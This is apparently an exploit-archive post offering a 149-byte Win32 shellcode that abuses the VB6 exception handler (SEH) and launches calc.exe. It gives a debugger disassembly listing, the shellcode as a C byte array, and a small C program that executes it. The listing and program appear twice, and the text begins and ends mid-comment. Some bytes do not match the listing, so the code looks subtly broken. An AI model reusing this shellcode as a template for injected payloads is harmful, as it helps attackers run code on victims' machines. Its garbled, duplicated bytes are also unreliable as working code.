00401921   . 8D55 CC      | LEA EDX,DWORD PTR SS:[EBP-34]

00401924   . 8975 CC      | MOV DWORD PTR SS:[EBP-34],ESI

00401927   . 8D4D DC      | LEA ECX,DWORD PTR SS:[EBP-24]

0040192A   . 8975 DC      | MOV DWORD PTR SS:[EBP-24],ESI

0040192D   . C745 D4 616C632E657865   | MOV DWORD PTR SS:[EBP-2C], calc.exe

00401934   . C745 CC 08000000    | MOV DWORD PTR SS:[EBP-34],8

0040193B   . FF15 68104000       | CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarDup>]  ;  MSVBVM60.__vbaVarDup

00401941   . 8D45 DC    | LEA EAX,DWORD PTR SS:[EBP-24]

00401944   . 6A 02      | PUSH 2

00401946   . 50               | PUSH EAX

00401947   . FF15 34104000    | CALL DWORD PTR DS:[<&MSVBVM60.#600>]   ;  MSVBVM60.rtcShell

0040194D   . 8D4D DC          | LEA ECX,DWORD PTR SS:[EBP-24]

00401950   . DDD8       | FSTP ST

00401952   . FF15 08104000    | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>]  ;  MSVBVM60.__vbaFreeVar

00401958   . 8975 FC                  | MOV DWORD PTR SS:[EBP-4],ESI

0040195B   . 9B        | WAIT

0040195C   . 68 6E194000     | PUSH k3d4n5.0040196E

00401961   . EB 0A           | JMP SHORT k3d4n5.0040196D

00401963   . 8D4D DC         |  LEA ECX,DWORD PTR SS:[EBP-24]

00401966   . FF15 08104000   | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>]   ;  MSVBVM60.__vbaFreeVar

0040196C   . C3                        | RETN

*/

char SEH[] =

"\x55\x8B\xEC\x83\xEC\x0C\x68\x96\x10\x40\x00\x64\xA1\x00\x00\x00\x00\x50\x64"

"\x89\x25\x00\x00\x00\x00\x00\x40\x18\xF9\x83\xEC\x30\x53\x56\x57\x89\x65\xF4"

"\xC7\x45\xF8\x80\x10\x40\x00\x8B\x45\x08\x8B\xC8\x83\xE1\x01\x89\x4D\xFC\x24"

"\xFE\x50\x89\x45\x08\x8B\x10\xFF\x52\x04\x33\xF6\x8D\x55\xCC\x89\x75\xCC\x8D"

"\x4D\xDC\x89\x75\xDC\xC7\x45\xD4\x61\x6C\x63\x2E\x65\x78\x65\xC7\x45\xCC\x08"

"\x00\x00\x00\xFF\x15\x68\x10\x40\x00\x8D\x45\xDC\x6A\x02\x50\xFF\x15\x34\x10"

"\x00\x8D\x4D\xDC\xDD\xD8\xFF\x15\x08\x10\x40\x00\x89\x75\xFC\x9B\x68\x41\x42"

"\x43\x40\x44\xEB\x0A\x8D\x4D\xDC\xFF\x15\x08\x10\x40\x00\xC3";



int main(int argc, char **argv)

{

int (*shellcode)();

shellcode = (int (*)()) SEH;

(int)(*shellcode)();

}

/*

VB6_vbaExceptHandler - SEH (calc.exe) ShellCode

# =========[ Sh31LC0d3.C ]=====>

/*

###

# Title : Win32 VB6_vbaExceptHandler - SEH (calc.exe) ShellCode - 149 Bytes

# Author : KedAns-Dz

# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com

# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)

# Twitter page : twitter.com/kedans

# platform : Win32

# Target : VB6 ExE Project >*> Command : Shell ("calc.exe")

# Tested on : Windows XP SP3 France

###

*/

// TesT Project   >> Compile As Name k3d4n5.exe <<

/*

004018E0   > 55      | PUSH EBP

004018E1   . 8BEC    | MOV EBP,ESP

004018E3   . 83EC 0C   | SUB ESP,0C

004018E6   . 68 96104000  | PUSH <JMP.&MSVBVM60.__vbaExceptHandler>  ;  SE handler installation (SEH)

004018EB   . 64:A1 00000000 | MOV EAX,DWORD PTR FS:[0]

004018F1   . 50          | PUSH EAX

004018F2   . 64:8925 00000000   | MOV DWORD PTR FS:[0],ESP

004018F9   . 83EC 30     | SUB ESP,30

004018FC   . 53          | PUSH EBX

004018FD   . 56          | PUSH ESI

004018FE   . 57          | PUSH EDI

004018FF   . 8965 F4     | MOV DWORD PTR SS:[EBP-C],ESP

00401902   . C745 F8 80104000   | MOV DWORD PTR SS:[EBP-8],k3d4n5.00401080

00401909   . 8B45 08      | MOV EAX,DWORD PTR SS:[EBP+8]

0040190C   . 8BC8         | MOV ECX,EAX

0040190E   . 83E1 01      | AND ECX,1

00401911   . 894D FC      | MOV DWORD PTR SS:[EBP-4],ECX

00401914   . 24 FE        | AND AL,0FE

00401916   . 50           | PUSH EAX

00401917   . 8945 08      | MOV DWORD PTR SS:[EBP+8],EAX

0040191A   . 8B10         | MOV EDX,DWORD PTR DS:[EAX]

0040191C   . FF52 04      | CALL DWORD PTR DS:[EDX+4]

0040191F   . 33F6         | XOR ESI,ESI

00401921   . 8D55 CC      | LEA EDX,DWORD PTR SS:[EBP-34]

00401924   . 8975 CC      | MOV DWORD PTR SS:[EBP-34],ESI

00401927   . 8D4D DC      | LEA ECX,DWORD PTR SS:[EBP-24]

0040192A   . 8975 DC      | MOV DWORD PTR SS:[EBP-24],ESI

0040192D   . C745 D4 616C632E657865   | MOV DWORD PTR SS:[EBP-2C], calc.exe

00401934   . C745 CC 08000000    | MOV DWORD PTR SS:[EBP-34],8

0040193B   . FF15 68104000       | CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarDup>]  ;  MSVBVM60.__vbaVarDup

00401941   . 8D45 DC    | LEA EAX,DWORD PTR SS:[EBP-24]

00401944   . 6A 02      | PUSH 2

00401946   . 50               | PUSH EAX

00401947   . FF15 34104000    | CALL DWORD PTR DS:[<&MSVBVM60.#600>]   ;  MSVBVM60.rtcShell

0040194D   . 8D4D DC          | LEA ECX,DWORD PTR SS:[EBP-24]

00401950   . DDD8       | FSTP ST

00401952   . FF15 08104000    | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>]  ;  MSVBVM60.__vbaFreeVar

00401958   . 8975 FC                  | MOV DWORD PTR SS:[EBP-4],ESI

0040195B   . 9B        | WAIT

0040195C   . 68 6E194000     | PUSH k3d4n5.0040196E

00401961   . EB 0A           | JMP SHORT k3d4n5.0040196D

00401963   . 8D4D DC         |  LEA ECX,DWORD PTR SS:[EBP-24]

00401966   . FF15 08104000   | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>]   ;  MSVBVM60.__vbaFreeVar

0040196C   . C3                        | RETN

*/

char SEH[] =

"\x55\x8B\xEC\x83\xEC\x0C\x68\x96\x10\x40\x00\x64\xA1\x00\x00\x00\x00\x50\x64"

"\x89\x25\x00\x00\x00\x00\x00\x40\x18\xF9\x83\xEC\x30\x53\x56\x57\x89\x65\xF4"

"\xC7\x45\xF8\x80\x10\x40\x00\x8B\x45\x08\x8B\xC8\x83\xE1\x01\x89\x4D\xFC\x24"

"\xFE\x50\x89\x45\x08\x8B\x10\xFF\x52\x04\x33\xF6\x8D\x55\xCC\x89\x75\xCC\x8D"

"\x4D\xDC\x89\x75\xDC\xC7\x45\xD4\x61\x6C\x63\x2E\x65\x78\x65\xC7\x45\xCC\x08"

"\x00\x00\x00\xFF\x15\x68\x10\x40\x00\x8D\x45\xDC\x6A\x02\x50\xFF\x15\x34\x10"

"\x00\x8D\x4D\xDC\xDD\xD8\xFF\x15\x08\x10\x40\x00\x89\x75\xFC\x9B\x68\x41\x42"

"\x43\x40\x44\xEB\x0A\x8D\x4D\xDC\xFF\x15\x08\x10\x40\x00\xC3";



int main(int argc, char **argv)

{

int (*shellcode)();

shellcode = (int (*)()) SEH;

(int)(*shellcode)();

}

/*